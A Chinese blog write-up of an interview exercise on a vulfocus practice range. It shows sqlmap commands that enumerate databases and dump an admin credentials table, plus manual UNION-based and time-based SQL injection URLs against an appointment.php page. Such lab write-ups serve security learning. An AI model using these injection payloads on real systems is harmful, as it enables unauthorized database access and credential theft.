概述

  • 面试遇到一个靶场,复盘一下

  • 测试环境: vulfocus在线靶场 http://vulfocus.io/

  • 面试时的测试经过:

  1. bp+xray
  2. kali 扫目录
  3. 经面试官提示 sql 注入, 因为此前有类似的界面就直接再下图进行了post注入(注入点不在这)

image-20220930193745625

  1. 后在登录界面发现post注入

image-20220930193943846

  1. 放到sqlmap进行注入,时间结束,没看到结果

重新测试

  • 面试结束,在xray的报告中发现该靶场的一些信息,重新进行测试

  • 靶场信息,面试的时候只知道ip

image-20220930194321625

  • awvs 扫描结果,和靶场描述一致

image-20220930194415448

SQL注入

  • 知道主要是sql注入,其他功能就先放弃测试

开测

  • 接着没测完的接着跑

image-20220930200912510

  • 保存http 开跑
1
sqlmap -r hms.txt --level 4 --dbs

image-20220930201141857

image-20220930202258048

  • hms
1
sqlmap -r hms.txt --level 4 -D hms --tables

image-20220930203235111

  • 看admin
1
sqlmap -r hms.txt --level 4 -D hms -T admin --columns

image-20220930204949842

  • 看字段
1
qlmap -r hms.txt --level 4 -D hms -T admin -C adminid,adminname,adminname,loginid,password,status,usertype --dump

image-20220930205411787

登录

  • 登陆失败 此方法结束

awvs的告

1.

image-20220930201322958

2.

image-20220930201349803

3.

image-20220930201423670

别人的方法

查看当前连接用户

1
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,user()%23

image-20220930205914037

1
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,database()%23#查看当前连接的数据库

image-20220930210001113

1
2
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,version()%23#查看当前数据库版本 
好像跟别人不一样

image-20220930210133729

1
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,@@global.version_compile_os%20from%20mysql.user%23#查看当前操作系统

image-20220930210227704

1
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23#查询所有表

image-20220930210320915

1
/appointment.php?editid=' AND (SELECT 1223 FROM (SELECT(SLEEP(5)))PQRv) AND 'VRKL'='VRKL#基于时间的注入
  • 我只能看懂到这了,下面是参考链接
1
https://www.cnblogs.com/HOPEAMOR/p/16251404.html?spm=a2c6h.12873639.article-detail.6.50a623c71UQ2XB